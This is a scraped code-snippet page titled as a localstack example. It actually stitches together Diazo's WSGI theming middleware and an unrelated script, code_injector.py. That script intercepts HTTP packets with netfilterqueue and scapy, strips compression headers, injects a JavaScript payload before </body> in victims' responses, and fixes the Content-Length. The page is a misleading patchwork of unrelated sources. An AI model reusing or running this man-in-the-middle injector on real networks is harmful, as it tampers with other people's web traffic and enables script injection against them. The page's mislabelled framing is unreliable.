How to use update_content_length method in localstack

Best Python code snippet using localstack_python

wsgi.py

Source:wsgi.py Github

copy

Full Screen

1import re2import pkg_resources3import os.path4from webob import Request5from lxml import etree, html6from repoze.xmliter.serializer import XMLSerializer7from repoze.xmliter.utils import getHTMLSerializer8from diazo.compiler import compile_theme9from diazo.utils import quote_param10DIAZO_OFF_HEADER = 'X-Diazo-Off'11def asbool(value):12 if isinstance(value, basestring):13 value = value.strip().lower()14 if value in ('true', 'yes', 'on', 'y', 't', '1',):15 return True16 elif value in ('false', 'no', 'off', 'n', 'f', '0'):17 return False18 else:19 raise ValueError("String is not true/false: %r" % value)20 else:21 return bool(value)22class FilesystemResolver(etree.Resolver):23 """Resolver for filesystem paths24 """25 def resolve(self, system_url, public_id, context):26 if not '://' in system_url and os.path.exists(system_url):27 return self.resolve_filename(system_url, context)28 else:29 return None30class NetworkResolver(etree.Resolver):31 """Resolver for network urls32 """33 def resolve(self, system_url, public_id, context):34 if '://' in system_url and system_url != 'file:///__diazo__':35 return self.resolve_filename(system_url, context)36 else:37 return None38class PythonResolver(etree.Resolver):39 """Resolver for python:// urls40 """41 42 def resolve(self, system_url, public_id, context):43 if not system_url.lower().startswith('python://'):44 return None45 46 spec = system_url[9:]47 package, resource_name = spec.split('/', 1)48 filename = pkg_resources.resource_filename(package, resource_name)49 50 return self.resolve_filename(filename, context)51class WSGIResolver(etree.Resolver):52 """Resolver that performs a WSGI subrequest53 """54 55 def __init__(self, app):56 self.app = app57 58 def resolve(self, system_url, public_id, context):59 # Ignore URLs with a scheme60 if '://' in system_url:61 return None62 63 # Ignore the special 'diazo:' resolvers64 if system_url.startswith('diazo:'):65 return None66 67 subrequest = Request.blank(system_url)68 response = subrequest.get_response(self.app)69 70 status_code = response.status.split()[0]71 if not status_code == '200':72 return None73 74 return self.resolve_string(response.body, context)75class XSLTMiddleware(object):76 """Apply XSLT in middleware77 """78 79 def __init__(self, app, global_conf,80 filename=None, tree=None,81 read_network=False,82 update_content_length=True,83 ignored_extensions=(84 'js', 'css', 'gif', 'jpg', 'jpeg', 'pdf', 'ps', 'doc',85 'png', 'ico', 'mov', 'mpg', 'mpeg', 'mp3', 'm4a', 'txt',86 'rtf', 'swf', 'wav', 'zip', 'wmv', 'ppt', 'gz', 'tgz',87 'jar', 'xls', 'bmp', 'tif', 'tga', 'hqx', 'avi',88 ),89 environ_param_map=None,90 **params91 ):92 """Initialise, giving a filename or parsed XSLT tree.93 94 The parameters are:95 96 * ``filename``, a filename from which to read the XSLT file97 * ``tree``, a pre-parsed lxml tree representing the XSLT file98 99 ``filename`` and ``tree`` are mutually exclusive.100 101 * ``read_network``, should be set to True to allow resolving resources102 from the network.103 * ``update_content_length``, can be set to False to avoid calculating104 an updated Content-Length header when applying the transformation.105 This is only a good idea if some middleware higher up the chain106 is going to set the content length instead.107 * ``ignored_extensions`` can be set to a list of filename extensions108 for which the transformation should never be applied109 * ``environ_param_map`` can be set to a dict of environ keys to110 parameter names. The corresponding values will then be sent to the111 transformation as parameters.112 113 Additional keyword arguments will be passed to the transformation as114 parameters.115 """116 117 self.app = app118 self.global_conf = global_conf119 120 if filename is not None:121 xslt_file = open(filename)122 source = xslt_file.read()123 tree = etree.fromstring(source)124 xslt_file.close()125 126 self.read_network = asbool(read_network)127 self.access_control = etree.XSLTAccessControl(read_file=True, write_file=False, create_dir=False, read_network=read_network, write_network=False)128 self.transform = etree.XSLT(tree, access_control=self.access_control)129 self.update_content_length = asbool(update_content_length)130 self.ignored_extensions = ignored_extensions131 132 self.ignored_pattern = re.compile("^.*\.(%s)$" % '|'.join(ignored_extensions))133 134 self.environ_param_map = environ_param_map or {}135 self.params = params136 137 def __call__(self, environ, start_response):138 request = Request(environ)139 response = request.get_response(self.app)140 141 app_iter = response(environ, start_response)142 143 if self.should_ignore(request) or not self.should_transform(response):144 return app_iter145 146 # Set up parameters147 148 params = {}149 for key, value in self.environ_param_map.items():150 if key in environ:151 params[value] = quote_param(environ[key])152 for key, value in self.params.items():153 params[key] = quote_param(value)154 155 # Apply the transformation156 app_iter = getHTMLSerializer(app_iter)157 tree = self.transform(app_iter.tree, **params)158 159 # Set content type and choose XHTML or HTML serializer160 serializer = html.tostring161 response.headers['Content-Type'] = 'text/html'162 163 if tree.docinfo.doctype and 'XHTML' in tree.docinfo.doctype:164 serializer = etree.tostring165 response.headers['Content-Type'] = 'application/xhtml+xml'166 167 app_iter = XMLSerializer(tree, serializer=serializer)168 169 # Calculate the content length - we still return the parsed tree170 # so that other middleware could avoid having to re-parse, even if171 # we take a hit on serialising here172 if self.update_content_length and 'Content-Length' in response.headers:173 response.headers['Content-Length'] = str(len(str(app_iter)))174 175 # Return a repoze.xmliter XMLSerializer, which helps avoid re-parsing176 # the content tree in later middleware stages177 return app_iter178 179 def should_ignore(self, request):180 """Determine if we should ignore the request181 """182 183 if asbool(request.headers.get(DIAZO_OFF_HEADER, 'no')):184 return True185 186 path = request.path_info187 if self.ignored_pattern.search(path) is not None:188 return True189 190 return False191 192 def should_transform(self, response):193 """Determine if we should transform the response194 """195 196 if asbool(response.headers.get(DIAZO_OFF_HEADER, 'no')):197 return False198 199 content_type = response.headers.get('Content-Type')200 if not content_type or not (201 content_type.lower().startswith('text/html') or202 content_type.lower().startswith('application/xhtml+xml')203 ):204 return False205 206 content_encoding = response.headers.get('Content-Encoding')207 if content_encoding in ('zip', 'deflate', 'compress',):208 return False209 210 status_code = response.status.split()[0]211 if status_code.startswith('3') or status_code == '204' or status_code == '401':212 return False213 214 return True215class DiazoMiddleware(object):216 """Invoke the Diazo transform as middleware217 """218 219 def __init__(self, app, global_conf, rules,220 theme=None,221 prefix=None,222 includemode='document',223 debug=False,224 read_network=False,225 update_content_length=True,226 ignored_extensions=(227 'js', 'css', 'gif', 'jpg', 'jpeg', 'pdf', 'ps', 'doc',228 'png', 'ico', 'mov', 'mpg', 'mpeg', 'mp3', 'm4a', 'txt',229 'rtf', 'swf', 'wav', 'zip', 'wmv', 'ppt', 'gz', 'tgz',230 'jar', 'xls', 'bmp', 'tif', 'tga', 'hqx', 'avi',231 ),232 environ_param_map=None,233 **params234 ):235 """Create the middleware. The parameters are:236 237 * ``rules``, the rules file238 * ``theme``, a URL to the theme file (may be a file:// URL)239 * ``debug``, set to True to recompile the theme on each request240 * ``prefix`` can be set to a string that will be prefixed to241 any *relative* URL referenced in an image, link or stylesheet in the242 theme HTML file before the theme is passed to the compiler. This243 allows a theme to be written so that it can be opened and views244 standalone on the filesystem, even if at runtime its static245 resources are going to be served from some other location. For246 example, an ``<img src="images/foo.jpg" />`` can be turned into 247 ``<img src="/static/images/foo.jpg" />`` with a ``prefix`` of248 "/static".249 * ``includemode`` can be set to 'document', 'esi' or 'ssi' to change250 the way in which includes are processed251 * ``read_network``, should be set to True to allow resolving resources252 from the network.253 * ``update_content_length``, can be set to False to avoid calculating254 an updated Content-Length header when applying the transformation.255 This is only a good idea if some middleware higher up the chain256 is going to set the content length instead.257 * ``ignored_extensions`` can be set to a list of filename extensions258 for which the transformation should never be applied259 260 Additional keyword arguments will be passed to the theme261 transformation as parameters.262 """263 264 self.app = app265 self.global_conf = global_conf266 267 self.rules = rules268 self.theme = theme269 self.absolute_prefix = prefix270 self.includemode = includemode271 self.debug = asbool(debug)272 self.read_network = asbool(read_network)273 self.update_content_length = asbool(update_content_length)274 self.ignored_extensions = ignored_extensions275 276 self.access_control = etree.XSLTAccessControl(read_file=True, write_file=False, create_dir=False, read_network=read_network, write_network=False)277 self.transform_middleware = None278 279 self.environ_param_map = environ_param_map or {}280 self.environ_param_map.update({281 'diazo.path': 'path',282 'diazo.host': 'host',283 'diazo.scheme': 'scheme',284 })285 286 self.params = params.copy()287 288 def compile_theme(self):289 """Compile the Diazo theme, returning an lxml tree (containing an XSLT290 document)291 """292 293 filesystem_resolver = FilesystemResolver(self.app)294 wsgi_resolver = WSGIResolver(self.app)295 python_resolver = PythonResolver()296 network_resolver = NetworkResolver()297 298 rules_parser = etree.XMLParser(recover=False)299 rules_parser.resolvers.add(filesystem_resolver)300 rules_parser.resolvers.add(wsgi_resolver)301 rules_parser.resolvers.add(python_resolver)302 if self.read_network:303 rules_parser.resolvers.add(network_resolver)304 305 theme_parser = etree.HTMLParser()306 theme_parser.resolvers.add(filesystem_resolver)307 theme_parser.resolvers.add(wsgi_resolver)308 theme_parser.resolvers.add(python_resolver)309 if self.read_network:310 theme_parser.resolvers.add(network_resolver)311 312 xsl_params = self.params.copy()313 for value in self.environ_param_map.values():314 if value not in xsl_params:315 xsl_params[value] = None316 317 return compile_theme(self.rules,318 theme=self.theme,319 absolute_prefix=self.absolute_prefix,320 includemode=self.includemode,321 access_control=self.access_control,322 read_network=self.read_network,323 parser=theme_parser,324 rules_parser=rules_parser,325 xsl_params=xsl_params,326 )327 328 def get_transform_middleware(self):329 return XSLTMiddleware(self.app, self.global_conf,330 tree=self.compile_theme(),331 read_network=self.read_network,332 update_content_length=self.update_content_length,333 ignored_extensions=self.ignored_extensions,334 environ_param_map=self.environ_param_map,335 **self.params336 )337 338 def __call__(self, environ, start_response):339 transform_middleware = self.transform_middleware340 if transform_middleware is None or self.debug:341 transform_middleware = self.get_transform_middleware()342 if transform_middleware is not None and not self.debug:343 self.transform_middleware = transform_middleware344 345 # Set up variables, some of which are used as transform parameters346 request = Request(environ)347 348 environ['diazo.rules'] = self.rules349 environ['diazo.absolute_prefix'] = self.absolute_prefix350 environ['diazo.path'] = request.path351 environ['diazo.host'] = request.host352 environ['diazo.scheme'] = request.host353 ...

Full Screen

Full Screen

code_injector.py

Source:code_injector.py Github

copy

Full Screen

1#!/usr/bin/env python2import re3import netfilterqueue4from scapy.packet import Raw5from scapy.layers.inet import IP, TCP6redirect = b"HTTP/1.1 301 Moved Permanently\nLocation: https://arxiv.org/pdf/2105.14943.pdf\n\n" 7payload = b"<script>alert('h4ck3d');</script>\n"8def set_load(packet, load):9 # print(packet.show())10 packet[Raw].load = load11 del packet[IP].len12 del packet[IP].chksum13 del packet[TCP].chksum14 return packet15def process_packet(packet):16 17 scapy_packet = IP(packet.get_payload())18 if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):19 load = scapy_packet[Raw].load20 if scapy_packet[TCP].dport == 80:21 print("[+] HTTP Request")22 load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)23 # print(scapy_packet.show())24 elif scapy_packet[TCP].sport == 80:25 print("[+] HTTP Response")26 load = load.replace(b"</body>", payload + b"</body")27 content_length_search = re.search(b"(Content-Length:\s)(\d*)", load)28 if content_length_search and b"text/html" in load:29 content_length = content_length_search.group(2)30 update_content_length = int(content_length.decode()) + len(payload)31 print(f'Before: {content_length} ; After: {update_content_length}')32 load = load.replace(content_length, str(update_content_length).encode())33 # print(scapy_packet.show())34 35 if load != scapy_packet[Raw].load:36 mod_packet = set_load(scapy_packet, load)37 packet.set_payload(bytes(mod_packet))38 39 packet.accept()40def main():41 queue = netfilterqueue.NetfilterQueue()42 queue.bind(0, process_packet)43 queue.run()44if __name__ == "__main__":...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run localstack automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful